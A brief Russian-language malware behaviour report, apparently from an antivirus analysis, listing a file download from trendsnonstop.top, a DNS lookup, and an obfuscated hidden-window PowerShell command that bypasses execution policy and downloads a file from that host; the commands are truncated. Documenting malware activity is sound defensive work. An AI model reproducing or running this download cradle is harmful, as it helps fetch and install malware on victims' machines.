Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^Er^sHELl^.e^xe -exeC^utio^nP^o^lIcy b^ypa^Ss^ -NOpROFiL^E -w^iN^D^o^w^sTY^lE ^HI^dDEN (N^eW-^obJE^Ct^ SySt^eM.ne^T^.w^EB^cl^ieNT).^d^oW^nlO^adFilE('http://trendsnons...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^Er^sHELl^.e^xe -exeC^utio^nP^o^lIcy b^ypa^Ss^ -NOpROFiL^E -w^iN^D^o^w^sTY^lE ^HI^dDEN (N^eW-^obJE^Ct^ SySt^eM.ne^T^.w^EB^cl^ieNT).^d^oW^nlO^adFilE('http://trendsnons...' (со скрытым окном)